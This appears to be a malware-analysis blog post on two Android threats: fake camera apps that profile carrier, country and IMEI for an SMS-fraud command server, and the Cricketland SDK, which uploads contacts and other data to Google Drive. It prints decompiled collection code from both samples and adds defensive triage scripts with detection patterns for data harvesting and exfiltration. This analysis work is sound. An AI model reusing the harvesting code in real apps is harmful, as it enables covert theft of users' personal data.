Phony Phone — Case Study 3&4

PurpleSynapz
1 min read · Apr 6, 2024


Case Study 3: Camera Apps

This malware family, which often masqueraded as camera apps or other system utilities, collected the device's country and mobile carrier and sent them to a command-and-control server, which replied with the phone number and the SMS message text to send. Because the server chose the target per device, the operators could run the same apps in different countries, and move into new ones, without updating the apps. The following listing, extracted from com.batterypro (v4, 29ee), shows how that profiling data was gathered on first run: the carrier name, the IMEI and the cc value, which (assuming the wrapper delegates to TelephonyManager.getNetworkOperator()) is the numeric MCC+MNC code whose first three digits identify the country.

    // Decompiled from com.batterypro (v4, 29ee): profiling parameters collected once, on first run.
    // 2131034134 and 2131034135 are string resource IDs; their values are not shown here.
    if (this.prefsWrapper.isFirstRun()) {
        this.params.put("pid", this.getString(2131034134));
        this.params.put("pin", String.valueOf(this.utils.getPin()));
        // Carrier name, with newlines stripped so it survives the request encoding.
        this.params.put("carrier",
            this.telephonyInfo.getTelephonyNetworkOperatorName().replaceAll("\n", ""));
        this.params.put("imei", this.telephonyInfo.getTelephonyIMEI());
        this.params.put("market", "1");
        // Presumably TelephonyManager.getNetworkOperator(): the MCC+MNC code, which identifies the country.
        this.params.put("cc",
            this.telephonyInfo.getTelephonyNetworkOperator());
        this.params.put("appurl", this.getString(2131034135));
    }
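The listing builds a key/value map that is sent to the server; what matters for an analyst is what the server can read out of it. The following script is an added example, not code from the original post or from the malware: it decodes a URL-encoded beacon body shaped like that map, splits the cc value into MCC and MNC, maps the MCC to a country, and sanity-checks the IMEI with the Luhn checksum so that emulator or junk values stand out in captured traffic. The sample beacon, its field values and the partial MCC table are constructed for the example; that cc carries an MCC+MNC string is an assumption based on the wrapper's name.

```python
"""Decode the first-run profiling beacon from Case Study 3.

Added example (not code from the original post or from the malware). It shows
what a command-and-control server can learn from one beacon: the country (from
the MCC), the carrier, and whether the IMEI looks like a real handset.
"""
from urllib.parse import parse_qs

# Partial Mobile Country Code table (constructed subset of the public ITU list).
MCC_COUNTRY = {
    "208": "France",
    "234": "United Kingdom",
    "262": "Germany",
    "310": "United States",
    "404": "India",
    "452": "Vietnam",
    "724": "Brazil",
}


def split_plmn(cc: str) -> tuple[str, str]:
    """Split a PLMN code (MCC followed by a 2- or 3-digit MNC) into its parts."""
    if not cc.isdigit() or len(cc) not in (5, 6):
        raise ValueError(f"malformed PLMN code: {cc!r}")
    return cc[:3], cc[3:]


def luhn_ok(number: str) -> bool:
    """Luhn checksum as used for IMEIs; the rightmost digit is the check digit."""
    if not number.isdigit():
        return False
    total = 0
    for i, ch in enumerate(reversed(number)):
        d = int(ch)
        if i % 2 == 1:          # every second digit from the right is doubled
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def classify_imei(imei: str) -> str:
    """Rough triage of the 'imei' field: real handset, emulator-like, or junk."""
    if len(imei) != 15 or not imei.isdigit():
        return "malformed"
    if imei == "0" * 15:        # typical emulator value; note it passes Luhn
        return "emulator-like"
    return "valid-luhn" if luhn_ok(imei) else "bad-checksum"


def decode_beacon(body: str) -> dict:
    """Parse one beacon body and derive what the server uses to pick a target."""
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    mcc, mnc = split_plmn(fields.get("cc", ""))
    return {
        "first_run_fields": sorted(fields),
        "mcc": mcc,
        "mnc": mnc,
        "country": MCC_COUNTRY.get(mcc, "unknown"),
        "carrier": fields.get("carrier", ""),
        "imei_status": classify_imei(fields.get("imei", "")),
        "market": fields.get("market"),
    }


# Constructed sample beacon: same keys as the listing, values made up for this example.
SAMPLE_BEACON = (
    "pid=bp4&pin=1234&carrier=Example+Mobile&imei=490154203237518"
    "&market=1&cc=45204&appurl=http%3A%2F%2Fexample.invalid%2Fapp"
)

if __name__ == "__main__":
    for key, value in decode_beacon(SAMPLE_BEACON).items():
        print(f"{key:>17}: {value}")
```

Run it against a body captured from a proxy or a PCAP instead of SAMPLE_BEACON; a country that does not match the handset's locale, or an all-zero IMEI, is a quick tell that the sample was run in a sandbox rather than on a victim device.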

Case Study 4: SDK used by Apps

Cricketland was an SDK embedded in apparently legitimate apps originating from Vietnam. Without the user's consent it sent the user's contact list to a remote server: when an app that included Cricketland initialized the SDK, the SDK gathered the information below and immediately uploaded it to a page hosted on Google Drive. One app incorporating the Cricketland SDK was masteryourgames.amazingalextoolbox (v12, c4f0); its data collection code is shown in the following listing, which builds the list of fields the SDK reports, including the device's contacts, accounts, location and installed packages.

    // Decompiled from masteryourgames.amazingalextoolbox (v12, c4f0): the fields the Cricketland
    // SDK collects when it is initialized. CReportField holds the SDK's static field constants.
    import net.cricketland.android.lib.report.CReportField;

    CReportField[] v0_4 = new CReportField[17];
    v0_4[0]  = CReportField.DEVICE_ID;
    v0_4[1]  = CReportField.UUID;
    v0_4[2]  = CReportField.PACKAGE_NAME;
    v0_4[3]  = CReportField.VERSION_CODE;
    v0_4[4]  = CReportField.IP;
    v0_4[5]  = CReportField.PHONE;
    v0_4[6]  = CReportField.ACCOUNTS;
    v0_4[7]  = CReportField.CONTACTS;    // the contact list exfiltrated to Google Drive
    v0_4[8]  = CReportField.LOCALE;
    v0_4[9]  = CReportField.LOCATION;
    v0_4[10] = CReportField.SDK;
    v0_4[11] = CReportField.BUILD;
    v0_4[12] = CReportField.CPU;
    v0_4[13] = CReportField.MEM;
    v0_4[14] = CReportField.DISPLAY;
    v0_4[15] = CReportField.FEATURES;
    v0_4[16] = CReportField.PACKAGES;
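Both case studies come down to the same analyst question: does this APK reference data-collection APIs, does its manifest grant the permissions that make them work, and does it have a way to send the data out? The following script is an added example, not code from the original post, from the Cricketland SDK or from the apps named above. It scans decompiled Java (as jadx or a similar decompiler would emit it) together with the AndroidManifest.xml for indicator hits, marks an indicator as armed only when the manifest grants a permission that lets it succeed, and flags the app as exfiltration-capable when an armed collector is paired with network egress. The source and manifest below are constructed samples that mirror the two listings; the indicator regexes, the permission mapping and the scoring rule are this example's own assumptions, not a published detection rule.

```python
"""Static triage for the collection patterns in Case Studies 3 and 4.

Added example, not code from the original post or from any of the apps it names.
Inputs are decompiled source text plus the app's manifest; both samples here are
constructed for the example.
"""
import re
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# What each regex means if it appears in decompiled code (assumed indicator set).
CODE_INDICATORS = {
    "contacts": re.compile(r"CReportField\.(CONTACTS|ACCOUNTS)|ContactsContract|AccountManager"),
    "device_id": re.compile(r"CReportField\.(DEVICE_ID|PHONE)|getDeviceId|getImei|getTelephonyIMEI|getLine1Number"),
    "location": re.compile(r"CReportField\.LOCATION|getLastKnownLocation|LocationManager"),
    "carrier": re.compile(r"getNetworkOperator|getSimOperator|getTelephonyNetworkOperator"),
    "installed_apps": re.compile(r"CReportField\.PACKAGES|getInstalledPackages|getInstalledApplications"),
    "network_egress": re.compile(r"HttpURLConnection|OkHttpClient|drive\.google\.com|https?://"),
}

# Permissions that turn an indicator into a working capability (empty set: none needed).
PERMISSION_FOR = {
    "contacts": {"android.permission.READ_CONTACTS", "android.permission.GET_ACCOUNTS"},
    "device_id": {"android.permission.READ_PHONE_STATE"},
    "location": {"android.permission.ACCESS_FINE_LOCATION", "android.permission.ACCESS_COARSE_LOCATION"},
    "carrier": set(),
    "installed_apps": set(),
    "network_egress": {"android.permission.INTERNET"},
}

PACKAGE_RE = re.compile(r"\b(?:net|com|org)\.[a-z][a-z0-9_]*\b")


def manifest_permissions(manifest_xml: str) -> set[str]:
    """Collect every <uses-permission android:name=...> from the manifest."""
    root = ET.fromstring(manifest_xml)
    return {el.get(ANDROID_NS + "name", "") for el in root.iter("uses-permission")}


def scan_source(source: str) -> dict[str, list[int]]:
    """Return {indicator: [line numbers]} for every indicator seen in the source."""
    hits: dict[str, list[int]] = {}
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, pattern in CODE_INDICATORS.items():
            if pattern.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits


def triage(source: str, manifest_xml: str, app_package: str) -> dict:
    """Combine code hits with manifest permissions into a verdict."""
    perms = manifest_permissions(manifest_xml)
    hits = scan_source(source)
    armed = {name for name in hits if not PERMISSION_FOR[name] or PERMISSION_FOR[name] & perms}
    # Top-level package prefixes that are not the app's own: candidate bundled SDKs.
    foreign = sorted({p for p in PACKAGE_RE.findall(source) if not app_package.startswith(p)})
    exfil_capable = "network_egress" in armed and bool(armed & {"contacts", "device_id", "location"})
    return {"hits": hits, "armed": sorted(armed), "exfil_capable": exfil_capable,
            "third_party_packages": foreign}


# Constructed sample source mirroring the two listings (not the real apps' code).
SAMPLE_SOURCE = """\
package masteryourgames.amazingalextoolbox;   // constructed sample
import java.net.HttpURLConnection;
public class Report {
    void collect() {
        net.cricketland.android.lib.report.CReportField[] fields = new net.cricketland.android.lib.report.CReportField[3];
        fields[0] = net.cricketland.android.lib.report.CReportField.DEVICE_ID;
        fields[1] = net.cricketland.android.lib.report.CReportField.CONTACTS;
        fields[2] = net.cricketland.android.lib.report.CReportField.LOCATION;
        String cc = telephonyInfo.getTelephonyNetworkOperator();
        HttpURLConnection c = (HttpURLConnection) new java.net.URL("https://drive.google.com/...").openConnection();
    }
}
"""

# Constructed manifest: contacts and phone state granted, location not.
SAMPLE_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="masteryourgames.amazingalextoolbox">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
</manifest>
"""

if __name__ == "__main__":
    for key, value in triage(SAMPLE_SOURCE, SAMPLE_MANIFEST, "masteryourgames.amazingalextoolbox").items():
        print(f"{key:>20}: {value}")
```

The permission gate is the useful part: the constructed sample references LOCATION but requests no location permission, so that indicator is reported as a hit but not as armed, while CONTACTS plus READ_CONTACTS plus an HTTP client to drive.google.com is exactly the Case Study 4 shape and trips the exfiltration verdict. Run it over the jadx output directory by concatenating the .java files, and treat the third_party_packages list as the first place to look for a bundled SDK.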
